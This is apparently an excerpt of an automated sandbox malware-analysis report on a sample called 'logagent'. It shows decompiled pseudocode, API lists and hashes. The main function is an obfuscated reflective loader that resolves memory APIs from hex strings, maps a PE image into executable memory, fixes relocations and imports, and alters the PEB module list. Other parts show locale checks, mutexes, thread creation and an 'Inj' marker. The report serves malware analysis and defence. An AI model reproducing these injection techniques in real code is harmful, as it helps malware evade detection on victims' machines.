                                  				signed char _t188;
                                  				void* _t189;
                                  				signed int _t190;
                                  				struct HINSTANCE__* _t194;
                                  				intOrPtr _t196;
                                  				intOrPtr* _t197;
                                  				intOrPtr* _t198;
                                  				intOrPtr _t201;
                                  				intOrPtr* _t202;
                                  				signed char _t204;
                                  				signed int _t207;
                                  				long _t209;
                                  				void* _t210;
                                  				signed int _t215;
                                  				void* _t217;
                                  				intOrPtr _t221;
                                  				signed char _t233;
                                  				intOrPtr _t260;
                                  				unsigned int _t262;
                                  				intOrPtr _t265;
                                  				void* _t266;
                                  				signed int _t267;
                                  				signed int _t270;
                                  				void* _t276;
                                  				signed int _t277;
                                  				void* _t278;
                                  				void* _t280;
                                  				void* _t283;
                                  				void* _t287;
                                  				void* _t290;
                                  				intOrPtr _t293;
                                  				void* _t294;
                                  				void* _t295;
                                  				struct HINSTANCE__* _t297;
                                  				void* _t310;
                                  				void* _t311;
                                  				void* _t313;
                                  				intOrPtr* _t314;
                                  				intOrPtr* _t316;
                                  				void* _t317;
                                  				intOrPtr* _t320;
                                  				void* _t326;
                                  				intOrPtr* _t328;
                                  				void* _t329;
                                  				void* _t330;
                                  				void* _t332;
                                  				void* _t333;
                                  				void* _t334;
                                  				void* _t335;
                                  				void* _t336;
                                  				signed char _t338;
                                  				signed int _t339;
                                  				signed int _t340;
                                  				signed int _t342;
                                  
                                  				_t276 = __edi;
                                  				_pop(_t328);
                                  				asm("aad 0xec");
                                  				_t132 = __ebx;
                                  				asm("salc");
                                  				_t233 = __edx + 0x00000001 ^  *(__ebx - 0x44bbd9bd);
                                  				_t204 = __ecx - 1;
                                  				_t188 = __eax - 0x562956bc;
                                  				_t338 = _t188;
                                  				if(_t338 == 0) {
                                  					L9:
                                  					_push(_t276);
                                  					_t10 = _t233 + 0x798ced37;
                                  					 *_t10 =  *(_t233 + 0x798ced37) | _t204;
                                  					_t342 =  *_t10;
                                  				} else {
                                  					if(_t338 > 0) {
                                  						asm("fnstenv [eax]");
                                  						_t4 = __edi + 0x78;
                                  						 *_t4 =  *(__edi + 0x78) ^ 0x837eb642;
                                  						_t339 =  *_t4;
                                  						while(1) {
                                  							L3:
                                  							_t233 = 0x7e;
                                  							while(1) {
                                  								if (_t339 <= 0) goto 0x10540fb1;
                                  								if(_t339 <= 0) {
                                  									goto L3;
                                  								}
                                  								_t6 = _t276 + 0x4482f8cc;
                                  								 *_t6 =  *(_t276 + 0x4482f8cc) ^ 0x6a26334b;
                                  								_t340 =  *_t6;
                                  								if(_t340 != 0) {
                                  									continue;
                                  								}
                                  								asm("xlatb");
                                  								asm("loope 0x61");
                                  								asm("invalid");
                                  								_t8 = _t132;
                                  								_t132 = _t204;
                                  								_t204 = _t8;
                                  								if (_t340 == 0) goto 0x10540fd6;
                                  								L8:
                                  								asm("salc");
                                  								_t328 = _t328 + _t188;
                                  								asm("int3");
                                  								asm("xlatb");
                                  								goto L9;
                                  							}
                                  						}
                                  					}
                                  				}
                                  				if(_t342 >= 0) {
                                  					goto L8;
                                  				}
                                  				_pop(es);
                                  				if(_t342 < 0) {
                                  					 *0x75FF00B9 =  *((intOrPtr*)(0x75ff00b9)) + 0xb9;
                                  					 *0x0000003A =  *0x0000003A | _t188;
                                  					asm("rcr ah, 0x1a");
                                  					_t134 = 0xb9 +  *0xb9;
                                  					_t277 = 0x21adc;
                                  					_t188 = 0xcdad7ccc;
                                  					L17:
                                  					_t277 = _t277 - 4;
                                  				} else {
                                  					asm("rcl byte [ecx-0x39494df0], cl");
                                  					_t134 = _t132 - 0x50;
                                  					if(_t134 >= 0) {
                                  						asm("pushad");
                                  						asm("fimul dword [ecx-0x473cb54e]");
                                  						_t134[0x38] = _t134[0x38] + _t204;
                                  						L15();
                                  						_t183 = 0x98f;
                                  						_t184 = _t183 & 0xfffff000;
                                  						 *_t328 =  *_t328 + _t184;
                                  						 *(_t328 + 4) =  *(_t328 + 4) + _t184;
                                  						 *((intOrPtr*)(_t328 + 8)) =  *((intOrPtr*)(_t328 + 8)) + _t184;
                                  						E105410AC(_t184, _t233); // executed
                                  						_t326 = 0x23034;
                                  						_t188 = 0x23038;
                                  						_pop(_t233);
                                  						 *(_t328 + 4) = _t204;
                                  						goto __eax;
                                  					}
                                  				}
                                  				asm("out dx, eax");
                                  				_t134 =  &(_t134[0x83]);
                                  				0x39649beb();
                                  				asm("cli");
                                  				_t189 = _t188 + 0x3933c444;
                                  				_t190 = _t189 + 0xbbda466c;
                                  				asm("ror edx, 0x35");
                                  				asm("bswap edx");
                                  				asm("rol edx, 0x9d");
                                  				asm("ror edx, 0xcd");
                                  				asm("ror edx, 0xe1");
                                  				asm("ror edx, 0x91");
                                  				asm("bswap edx");
                                  				asm("bswap edx");
                                  				asm("rol edx, 0x81");
                                  				_t188 = _t190 + 0xcd035c62 - 0x6bf50ae4 + 0x4f933205 - 0x618dddff;
                                  				asm("rol edx, 0xea");
                                  				asm("rol edx, 0xbc");
                                  				asm("rol edx, 0xa6");
                                  				_t233 = ( !( ~( !((( ~(( !(_t233 - _t277 - _t277 ^ _t277) - 0x47fa76c2 + _t189 - 0xac8e9f9d ^ _t277 ^ _t277) + _t189 + 0x5706c160 + _t190) + _t277 - _t190 ^ 0x90ae4c75 ^ _t190) - _t277 ^ 0xdb518b77) + 0xb0e45941)) + _t277 + 0xf858d7a8) ^ 0xe1a77b95) - _t277;
                                  				 *_t134 = _t233;
                                  				if(_t277 != 0) {
                                  					goto L17;
                                  				}
                                  				E105414E2(_t134);
                                  				_t137 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0x10))))(_t328, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
                                  				_t329 = _t328 + 0x10;
                                  				_t278 = _t137;
                                  				_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t137, _t329, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
                                  				_t330 = _t329 + 0x10;
                                  				_t194 = _t139;
                                  				if(_t139 != 0) {
                                  					_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t330, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
                                  					_t332 = _t330 + 0x10;
                                  					 *(_t326 - 0x74) = _t139;
                                  					if(_t139 != 0) {
                                  						_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t332, 0x74726956, 0x516c6175, 0x79726575, 0);
                                  						_t333 = _t332 + 0x10;
                                  						 *(_t326 - 0x78) = _t139;
                                  						if(_t139 != 0) {
                                  							_t139 =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t278, _t333, 0x61427349, 0x61655264, 0x72745064, 0);
                                  							_t334 = _t333 + 0x10;
                                  							 *(_t326 - 0x7c) = _t139;
                                  							if(_t139 != 0) {
                                  								_t280 = _t326 - 0x1f8;
                                  								_t207 = 0x3e;
                                  								memcpy(_t280,  *(_t326 + 8) +  *((intOrPtr*)( *(_t326 + 8) + 0x3c)), _t207 << 2);
                                  								_t335 = _t334 + 0xc;
                                  								_t283 = _t280;
                                  								_t144 =  *(_t283 + 0x34);
                                  								 *(_t326 - 4) = _t144;
                                  								_t209 =  *(_t283 + 0x50);
                                  								 *(_t326 - 8) = _t209;
                                  								_t145 = VirtualAlloc(_t144, _t209, 0x3000, 0x40); // executed
                                  								_t210 = _t209;
                                  								if(_t145 != 0) {
                                  									L25:
                                  									 *(_t326 - 0xc) = _t145;
                                  									_t310 =  *(_t326 + 8);
                                  									memcpy(_t145, _t310,  *(_t310 +  *((intOrPtr*)(_t310 + 0x3c)) + 0x54));
                                  									_t336 = _t335 + 0xc;
                                  									_t311 = _t310;
                                  									_t313 = _t311 +  *((intOrPtr*)(_t311 + 0x3c)) + 0xf8;
                                  									do {
                                  										_t287 = _t326 - 0x38;
                                  										_t215 = 0xa;
                                  										_t150 = memcpy(_t287, _t313, _t215 << 2);
                                  										_t336 = _t336 + 0xc;
                                  										_t290 = _t287;
                                  										_t260 =  *((intOrPtr*)(_t290 + 0x14));
                                  										if(_t260 != 0) {
                                  											_t150 = memcpy( *(_t326 - 0xc) +  *((intOrPtr*)(_t290 + 0xc)),  *(_t326 + 8) + _t260,  *(_t290 + 0x10));
                                  											_t336 = _t336 + 0xc;
                                  											_t313 = _t313;
                                  										}
                                  									} while (_t150 != 1);
                                  									_t262 =  *(_t326 - 0xc) -  *(_t326 - 4);
                                  									if(_t262 != 0) {
                                  										_t174 =  *(_t326 - 0xc);
                                  										_t201 =  *((intOrPtr*)(_t174 +  *((intOrPtr*)(_t174 + 0x3c)) + 0xa0));
                                  										if(_t201 != 0) {
                                  											_t202 = _t201 + _t174;
                                  											while( *((intOrPtr*)(_t202 + 4)) != 0) {
                                  												_t176 =  *(_t202 + 8) & 0x0000ffff;
                                  												_t320 =  *(_t326 - 0xc) +  *_t202 + (_t176 & 0x00000fff);
                                  												_t262 = _t262;
                                  												_t178 = (_t176 >> 0xc) - 1;
                                  												if(_t178 != 0) {
                                  													_t179 = _t178 - 1;
                                  													if(_t179 != 0) {
                                  														if(_t179 == 1) {
                                  															 *_t320 =  *_t320 + _t262;
                                  														}
                                  													} else {
                                  														_t181 = _t262 & 0x0000ffff;
                                  														goto L37;
                                  													}
                                  												} else {
                                  													_t181 = _t262 >> 0x10;
                                  													L37:
                                  													 *_t320 =  *_t320 + _t181;
                                  												}
                                  												asm("loop 0xffffffce");
                                  												_t202 = _t202 +  *((intOrPtr*)(_t202 + 4));
                                  											}
                                  										}
                                  									}
                                  									_t217 =  *(_t326 - 0xc);
                                  									 *((intOrPtr*)(_t326 - 0x4c)) =  *((intOrPtr*)(_t326 - 0x4c)) +  *((intOrPtr*)(_t326 - 0x50));
                                  									_t152 =  *[fs:0x30];
                                  									if( *((intOrPtr*)(_t326 - 0x44)) == 0) {
                                  										 *(_t152 + 8) = _t217;
                                  									}
                                  									_t154 =  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0xc)) + 0xc));
                                  									_t314 = _t154;
                                  									while( *(_t154 + 0x18) !=  *((intOrPtr*)(_t326 - 0x50)) ||  *((intOrPtr*)(_t154 + 0x1c)) !=  *((intOrPtr*)(_t326 - 0x4c)) ||  *((intOrPtr*)(_t154 + 0x20)) !=  *((intOrPtr*)(_t326 - 0x48))) {
                                  										if( *_t154 != _t314) {
                                  											_t154 =  *_t154;
                                  											continue;
                                  										}
                                  										L50:
                                  										_t196 =  *((intOrPtr*)(_t326 - 0x178));
                                  										if(_t196 == 0) {
                                  											L63:
                                  											_t197 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                  											 *((intOrPtr*)(_t326 - 0x70)) = _t197;
                                  											do {
                                  												_t265 =  *((intOrPtr*)(_t197 + 0x18));
                                  												if(_t265 !=  *((intOrPtr*)(_t326 - 0x50))) {
                                  													_t157 =  *(_t326 - 0x7c)(4, _t265);
                                  													_t266 = _t265;
                                  													if(_t157 == 0) {
                                  														_t293 =  *((intOrPtr*)(_t266 +  *((intOrPtr*)(_t266 + 0x3c)) + 0x80));
                                  														if(_t293 != 0) {
                                  															_t294 = _t293 + _t266;
                                  															while(1) {
                                  																_push(_t294);
                                  																asm("repe scasd");
                                  																_t295 = 5;
                                  																if(0 == 0) {
                                  																	goto L77;
                                  																}
                                  																_t316 =  *((intOrPtr*)(_t295 + 0x10)) +  *((intOrPtr*)(_t197 + 0x18));
                                  																_t161 =  *_t316 -  *((intOrPtr*)(_t326 - 0x50));
                                  																if(_t161 < 0 || _t161 >  *((intOrPtr*)(_t326 - 0x48))) {
                                  																	L71:
                                  																	_t294 = _t295 + 0x14;
                                  																	continue;
                                  																} else {
                                  																	 *(_t326 - 0x78)(_t316, _t326 - 0x9c, 0x1c);
                                  																	_t165 =  *(_t326 - 0x74)( *((intOrPtr*)(_t326 - 0x9c)),  *((intOrPtr*)(_t326 - 0x90)), 4, _t326 - 0x88);
                                  																	if(_t165 != 0) {
                                  																		_push(_t295);
                                  																		while(1) {
                                  																			asm("lodsd");
                                  																			if(_t165 == 0) {
                                  																				break;
                                  																			}
                                  																			_t165 = _t165 -  *((intOrPtr*)(_t326 - 0x50)) +  *(_t326 - 0xc);
                                  																			asm("stosd");
                                  																		}
                                  																		 *(_t326 - 0x74)( *((intOrPtr*)(_t326 - 0x9c)),  *((intOrPtr*)(_t326 - 0x90)),  *((intOrPtr*)(_t326 - 0x88)), _t326 - 0x84);
                                  																		_pop(_t295);
                                  																		goto L71;
                                  																	}
                                  																}
                                  																goto L77;
                                  															}
                                  														}
                                  													}
                                  												}
                                  												L77:
                                  												_t197 =  *_t197;
                                  											} while (_t197 !=  *((intOrPtr*)(_t326 - 0x70)));
                                  											_t139 =  *((intOrPtr*)(_t326 - 0x1d0)) +  *(_t326 - 0xc);
                                  										} else {
                                  											_t317 =  *(_t326 - 0xc);
                                  											_t198 = _t196 + _t317;
                                  											while(1) {
                                  												_t169 =  *((intOrPtr*)(_t198 + 0xc));
                                  												if(_t169 == 0) {
                                  													goto L63;
                                  												}
                                  												 *((intOrPtr*)(_t326 - 0x3c)) =  *((intOrPtr*)(_t198 + 0x10)) + _t317;
                                  												_t221 =  *_t198;
                                  												if(_t221 == 0) {
                                  													_t221 =  *((intOrPtr*)(_t198 + 0x10));
                                  												}
                                  												 *(_t326 - 0x40) = _t221 + _t317;
                                  												_t139 = LoadLibraryA(_t169 + _t317); // executed
                                  												if(_t139 != 0) {
                                  													_t297 = _t139;
                                  													while(1) {
                                  														_t267 =  *( *(_t326 - 0x40));
                                  														if(_t267 == 0) {
                                  															break;
                                  														}
                                  														if((_t267 & 0x80000000) == 0) {
                                  															_t270 = _t317 + _t267 + 2;
                                  														} else {
                                  															_t270 = _t267 & 0x7fffffff;
                                  														}
                                  														 *((intOrPtr*)( *((intOrPtr*)(_t326 - 0x3c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t326 + 0xc))))(_t297, _t270);
                                  														 *((intOrPtr*)(_t326 - 0x3c)) =  *((intOrPtr*)(_t326 - 0x3c)) + 4;
                                  														 *(_t326 - 0x40) =  &(( *(_t326 - 0x40))[1]);
                                  													}
                                  													_t198 = _t198 + 0x14;
                                  													continue;
                                  												}
                                  												goto L79;
                                  											}
                                  											goto L63;
                                  										}
                                  										goto L79;
                                  									}
                                  									 *(_t154 + 0x18) = _t217;
                                  									 *((intOrPtr*)(_t154 + 0x1c)) = _t217 +  *((intOrPtr*)(_t326 - 0x1d0));
                                  									 *((intOrPtr*)(_t154 + 0x20)) =  *((intOrPtr*)(_t326 - 0x1a8));
                                  									goto L50;
                                  								} else {
                                  									_t139 = _t194->i(_t145, _t210, 0x1000, 0x40);
                                  									if(_t139 != 0) {
                                  										goto L25;
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				L79:
                                  				return _t139;
                                  			}
                                  0x00000000
                                  0x1054146b
                                  0x10541475
                                  0x1054148d
                                  0x10541492
                                  0x10541494
                                  0x10541497
                                  0x10541497
                                  0x1054149a
                                  0x00000000
                                  0x00000000
                                  0x1054149f
                                  0x105414a2
                                  0x105414a2
                                  0x105414be
                                  0x105414c1
                                  0x00000000
                                  0x105414c1
                                  0x10541492
                                  0x00000000
                                  0x1054145f
                                  0x10541449
                                  0x10541445
                                  0x10541432
                                  0x105414c4
                                  0x105414c4
                                  0x105414c6
                                  0x105414d5
                                  0x105413a0
                                  0x105413a0
                                  0x105413a3
                                  0x105413a5
                                  0x105413a5
                                  0x105413aa
                                  0x00000000
                                  0x00000000
                                  0x105413b1
                                  0x105413b4
                                  0x105413b8
                                  0x105413ba
                                  0x105413ba
                                  0x105413bf
                                  0x105413c8
                                  0x105413cc
                                  0x105413d2
                                  0x105413d4
                                  0x105413d7
                                  0x105413db
                                  0x00000000
                                  0x00000000
                                  0x105413e3
                                  0x105413f0
                                  0x105413e5
                                  0x105413e5
                                  0x105413e5
                                  0x105413fb
                                  0x105413fd
                                  0x10541401
                                  0x10541401
                                  0x10541407
                                  0x00000000
                                  0x10541407
                                  0x00000000
                                  0x105413cc
                                  0x00000000
                                  0x105413a5
                                  0x00000000
                                  0x1054139e
                                  0x10541377
                                  0x10541380
                                  0x10541389
                                  0x00000000
                                  0x10541278
                                  0x10541281
                                  0x10541285
                                  0x00000000
                                  0x00000000
                                  0x10541285
                                  0x10541276
                                  0x10541242
                                  0x1054121c
                                  0x105411f6
                                  0x105414d8
                                  0x105414df

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &$K3&j
                                  • API String ID: 0-1358381531
                                  • Opcode ID: b23318fcd0f3d4be8cd8f0fbba66d9fc3a7c1fe41525f9fd7f26b4cfe6c209f9
                                  • Instruction ID: 3b9bfa2e29cd1dc1ab26d355f884f667220e9251882b67b2ca1ecdbc9175d6ac
                                  • Opcode Fuzzy Hash: b23318fcd0f3d4be8cd8f0fbba66d9fc3a7c1fe41525f9fd7f26b4cfe6c209f9
                                  • Instruction Fuzzy Hash: 64911731B052416FD700CF7ACC88ADA7F66EFC1260B29C269E854DF699E770A905C754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 10541271
                                  • LoadLibraryA.KERNELBASE(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 105413C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLibraryLoadVirtual
                                  • String ID:
                                  • API String ID: 3550616410-0
                                  • Opcode ID: 2e8b3f7192a4139205fe230969fd982786794dc2622a0623c7a6f820bc3734cf
                                  • Instruction ID: 6a224fb6f10317ef31cc5b5cab7815772e7221c7f65328583c002bddea6da0c7
                                  • Opcode Fuzzy Hash: 2e8b3f7192a4139205fe230969fd982786794dc2622a0623c7a6f820bc3734cf
                                  • Instruction Fuzzy Hash: 20D18171B00205AFDB14CF69CC84BDABBB6FF84360F258559E814EB699E770AD01CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00409E7D(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				char _v8;
                                  
                                  				// LCID 0x800 = LOCALE_SYSTEM_DEFAULT, LCType 0x5a = LOCALE_SISO3166CTRYNAME:
                                  				// reads the two-letter ISO 3166 country code (plus NUL, hence cchData = 3) into _v8
                                  				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
                                  				// std::basic_string<char>(const char*, const allocator&) from MSVCP60:
                                  				// wraps the country code in a std::string (argument mapping as recovered by the decompiler)
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
                                  				return _a4;
                                  			}

                                  Statement addresses: 0x00409e8e, 0x00409e9f (the GetLocaleInfoA and basic_string constructor refs in the APIs list below), 0x00409ea9.

                                  APIs
                                  • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro), ref: 00409E8E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.1 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                  • String ID:
                                  • API String ID: 4090406865-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Control-flow graph (text dump of the rendered graph, node labels only): basic blocks 408c98-408cf5 through 40981c-409820 of the function at 408c98, with edges given as node->node. Win32/CRT calls labelled on the graph: OpenMutexA, WaitForSingleObject, CloseHandle, CreateMutexA, GetLastError, GetModuleFileNameW, wcslen, wcscpy, atoi, CreateThread (several blocks), SetProcessDEPPolicy. The remaining labels are MSVCP60 std::basic_string<char>/std::basic_string<wchar_t> operations, the std::basic_ofstream open/write/close sequence in block 408d22-408d7c (the licence_code.txt write listed under APIs below), and subcalls to local functions (409823, 4129eb, 40180c, 412881, 40b47f and others).
                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
